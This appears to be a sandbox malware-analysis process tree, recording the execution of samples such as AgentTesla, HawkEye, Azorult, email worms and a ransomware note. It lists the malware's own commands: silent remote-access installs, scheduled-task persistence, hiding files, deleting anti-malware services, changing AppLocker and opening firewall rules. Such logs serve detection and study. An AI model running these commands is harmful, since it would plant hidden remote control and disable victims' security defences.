  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1408 /prefetch:8
  2⤵
  PID:4516
- C:\Users\Admin\Downloads\AnyDesk.exe
  "C:\Users\Admin\Downloads\AnyDesk.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2008
- C:\Users\Admin\Downloads\AnyDesk.exe
  "C:\Users\Admin\Downloads\AnyDesk.exe"
  2⤵
  - Chimera
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4420
- - C:\Users\Admin\Downloads\AnyDesk.exe
    "C:\Users\Admin\Downloads\AnyDesk.exe" --local-service
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3404
  - - C:\Users\Admin\Downloads\AnyDesk.exe
      "C:\Users\Admin\Downloads\AnyDesk.exe" --backend
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2928
- - C:\Users\Admin\Downloads\AnyDesk.exe
    "C:\Users\Admin\Downloads\AnyDesk.exe" --local-control
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: AddClipboardFormatListener
    PID:2172
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Music\YOUR_FILES_ARE_ENCRYPTED.HTML"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1836
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1836 CREDAT:17410 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:5256
- C:\Users\Admin\Downloads\AnyDesk.exe
  "C:\Users\Admin\Downloads\AnyDesk.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8036 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7952 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:4792

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3052

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x510
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1268

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt
1⤵
PID:1820

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:660

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4176
- C:\Users\Admin\AppData\Local\Temp\is-FUOM3.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-FUOM3.tmp\butterflyondesktop.tmp" /SL5="$604A6,2719719,54272,C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:1440
- - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
    "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
    3⤵
    PID:712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x104,0x124,0x120,0x128,0x7ffb150c46f8,0x7ffb150c4708,0x7ffb150c4718
      4⤵
      PID:1104

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3492

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"
1⤵
PID:4196

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Scare.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5556

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Winevar.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Winevar.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1428
- C:\Windows\SysWOW64\WIN2CC7.pif
  "C:\Windows\system32\WIN2CC7.pif" ~~241315031
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:3464

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Pikachu.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Pikachu.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5956

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\NakedWife.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\NakedWife.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6080

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Prolin.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Prolin.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2188

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Maldal.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Maldal.a.exe"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:3104

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Mari.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Mari.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 9.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 9.exe"
1⤵
PID:6988

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe"
1⤵
PID:2564

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe"
1⤵
PID:7396

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 22.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 22.exe"
1⤵
PID:9660

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"
1⤵
PID:10224
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  PID:7228
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    PID:7516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:8336
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:13160
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:14496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:14128
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        
        PID:12792
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        
        PID:2020
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        
        PID:11788
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:17924
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:8436
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:14716
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:9996
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:18100
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    PID:17112
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  PID:17204
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    PID:10096
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      PID:6516
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      PID:17740
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:9692
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        
        PID:6416
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:8628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:12624
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:11992
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:15796
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        
        PID:19160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:2404
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:6832
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      PID:19292
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        
        PID:14772
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1DBF.tmp\1DC0.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:8708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:15184
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      PID:10296
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        
        PID:2492
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:5228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:7460
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:8612
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:9984
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:13324
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6312
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:12980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      PID:13220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:13740
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:10776
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:17992
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:18504
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:9132
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:15532
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  PID:7204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:9744
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:11660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:10936
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:9292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:6844
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:14592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:15076
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:11244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:15104
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:16640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:9280
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:12292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:9608
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:10520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:11248
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:15772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:5572
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:9308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:7792
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:7496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:10712
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:11820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:11576
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:12340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:6380
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:7296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:7312
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:12992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:16380
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:5240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:13756
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:11504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:16852
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:16188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  PID:15584
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:16364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:16592
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:9076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:12320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:11696
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:8692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:11728
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:16756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:9532
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:7744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:5292
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:14200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:16180
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:8544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:4196
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:6860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:9792
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:14652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:8576
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:19616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:8280
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:14340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:6848
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:7840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:13732
- - C:\Windows\SysWOW64\netsh.exe
